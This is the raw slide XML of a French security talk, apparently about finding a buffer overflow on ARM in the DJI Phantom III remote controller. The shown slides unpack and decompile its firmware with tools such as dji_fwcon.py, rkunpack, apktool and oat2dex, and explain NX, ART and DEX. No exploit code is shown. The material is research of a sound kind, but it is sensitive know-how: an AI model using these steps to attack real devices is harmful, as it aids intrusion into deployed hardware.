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76" r:id="rId6"/>
    <p:sldId id="265" r:id="rId7"/>
    <p:sldId id="301" r:id="rId8"/>
    <p:sldId id="328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7" r:id="rId17"/>
    <p:sldId id="289" r:id="rId18"/>
    <p:sldId id="288" r:id="rId19"/>
    <p:sldId id="286" r:id="rId20"/>
    <p:sldId id="285" r:id="rId21"/>
    <p:sldId id="333" r:id="rId22"/>
    <p:sldId id="331" r:id="rId23"/>
    <p:sldId id="332" r:id="rId24"/>
    <p:sldId id="291" r:id="rId25"/>
    <p:sldId id="298" r:id="rId26"/>
    <p:sldId id="299" r:id="rId27"/>
    <p:sldId id="290" r:id="rId28"/>
    <p:sldId id="292" r:id="rId29"/>
    <p:sldId id="293" r:id="rId30"/>
    <p:sldId id="296" r:id="rId31"/>
    <p:sldId id="297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9" r:id="rId48"/>
    <p:sldId id="320" r:id="rId49"/>
    <p:sldId id="329" r:id="rId50"/>
    <p:sldId id="324" r:id="rId51"/>
    <p:sldId id="321" r:id="rId52"/>
    <p:sldId id="323" r:id="rId53"/>
    <p:sldId id="325" r:id="rId54"/>
    <p:sldId id="326" r:id="rId55"/>
    <p:sldId id="330" r:id="rId56"/>
    <p:sldId id="327" r:id="rId57"/>
    <p:sldId id="334" r:id="rId5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8136" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="91" d="100"/>
          <a:sy n="91" d="100"/>
        </p:scale>
        <p:origin x="1350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5FB9A08-40BC-47B5-8130-616BDCF09507}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>18/09/2018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2B9BC8-1895-4EB7-B2E1-D3911C69AD0C}" type="datetime1">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>18/09/2018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45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NX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> bit permet de marquer certaines page mémoire comme la pile comme non exécutable.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41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Deux champs important</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> pour construire un module:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>offset = indique la position du module dans le fichier .bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> = indique la taille du module dans le fichier .bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>md5 = MD5 du module </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" smtClean="0"/>
              <a:t>en question</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" smtClean="0"/>
              <a:t> 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194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18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08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76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s'intéresse à la</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> radiocommande, et la procédure de mise à jour.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Tablette : Android 5.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Communique via USB avec la radiocommande.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40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Travaux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> sur le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>phantom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> III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66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Magic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: Quelques octets au début du fichier pour indique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>r le type de fichier.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>RKFW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Rockchip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Firmware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Lightbridge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> : Utilisé pour la liaison radio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38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Apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> : Extraction des .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>dex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70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ART</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> c'est quoi ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Un environnement d'exécution utilisé par le système Android, il vise à remplacer le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>bytecode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> par des instructions natives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ART utilise la compilation anticipée, en compilant l'application à son installation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>DEX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Dalvik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EXcutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ODEX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Optimized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Dalvik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Excutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t>OAT : Of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ahead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" smtClean="0"/>
              <a:t> Time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 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53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24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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" baseline="0" dirty="0" smtClean="0"/>
              <a:t> registre est un emplacement de mémoire internet à un processeur. Mémoire rapide, mais très petite quelques octets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67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 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29800" y="457200"/>
            <a:ext cx="838200" cy="257176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="18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6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omtombinary.xyz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mtombinary" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Tomtombinary" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.root-me.org/Tomtombinar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Real buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> on arm architecture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Thomas DUBIER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Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> content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187788" y="2708949"/>
            <a:ext cx="3456384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+mj-lt"/>
              </a:rPr>
              <a:t>GL300E_v1200_20170609.bin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071664" y="4703469"/>
            <a:ext cx="208823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Module 1 : RKFW</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt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96000" y="4703469"/>
            <a:ext cx="2952328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Module 2 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Lightbridge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firmware</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Connecteur en angle 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4450668" y="3238157"/>
            <a:ext cx="1130424" cy="18002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stCxn id="5" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6178860" y="3310165"/>
            <a:ext cx="1130424" cy="165618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95388" y="1739452"/>
            <a:ext cx="10009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$ dji_fwcon.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>vv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> -x -p -f  GL300E_v1200_20170609.bin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4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Firmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> content (2)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511824" y="2204864"/>
            <a:ext cx="3456384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Module 1 : RKFW</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt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87688" y="4288284"/>
            <a:ext cx="2736304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Embedded-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>upgrade.img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> (RKAF)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt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968208" y="4296668"/>
            <a:ext cx="124177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Boot</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Connecteur en angle 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="5" idx="2"/>
            <a:endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4838266" y="2886534"/>
            <a:ext cx="1219324" cy="158417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stCxn id="5" idx="2"/>
            <a:endCxn id="7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6800701" y="2508275"/>
            <a:ext cx="1227708" cy="234907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03516" y="5777284"/>
            <a:ext cx="208823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+mj-lt"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ecovery.img</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt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758485" y="5777284"/>
            <a:ext cx="208823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+mj-lt"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>oader.bin</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt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195900" y="5777284"/>
            <a:ext cx="208823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+mj-lt"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>isc.img</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt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7507070" y="5777284"/>
            <a:ext cx="2088232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+mj-lt"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ystem.img</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt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840416" y="5777284"/>
            <a:ext cx="208823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+mj-lt"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>oot.img</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Connecteur en angle 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2639284" y="3760728"/>
            <a:ext cx="624904" cy="340820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6" idx="2"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3916769" y="5038213"/>
            <a:ext cx="624904" cy="85323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6" idx="2"/>
            <a:endCxn id="16" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="5135476" y="4672744"/>
            <a:ext cx="624904" cy="158417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6" idx="2"/>
            <a:endCxn id="17" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="6291061" y="3517159"/>
            <a:ext cx="624904" cy="389534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6" idx="2"/>
            <a:endCxn id="18" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="7457734" y="2350486"/>
            <a:ext cx="624904" cy="622869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03673" y="1667415"/>
            <a:ext cx="11324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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>rkunpack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> GL300E_v1200_20170609_m1300.bin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7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Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> 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0" y="1828800"/>
            <a:ext cx="11161240" cy="46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+mj-lt"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sudo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mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> package-file/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>system.img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-system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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SystemUpgrade</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0">
              <a:latin typeface="+mj-lt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arm lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SystemUpgrade.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SystemUpgrade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SystemUpgrade.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> ~/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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>apktool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SystemUpgrade.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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78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Extracting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> 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6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+mj-lt"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sudo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>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> package-file/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>system.img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt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dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-system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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt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dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>app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SystemUpgrade</a:t>
            </a:r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arm lib </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SystemUpgrade.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt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dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>-system/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>app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SystemUpgrade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SystemUpgrade.apk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> ~/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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty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SystemUpgrade.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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24000" y="450912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NO .DEX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A partir d'Android 5.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dalvik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> est remplacé entièrement par ART.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 in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>nutshell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600200"/>
            <a:ext cx="5564885" cy="5068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8048" y="2780928"/>
            <a:ext cx="544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http://www.blackhat.com/docs/asia-15/materials/asia-15-Sabanal-Hiding-Behind-ART-wp.pdf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5994" y="2411596"/>
            <a:ext cx="438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https://fr.wikipedia.org/wiki/ART_(Android)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34191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Decompile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07368" y="1828800"/>
            <a:ext cx="11172272" cy="1960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000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>oat2dex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> boot /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>mnt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3000" dirty="0" smtClean="0">
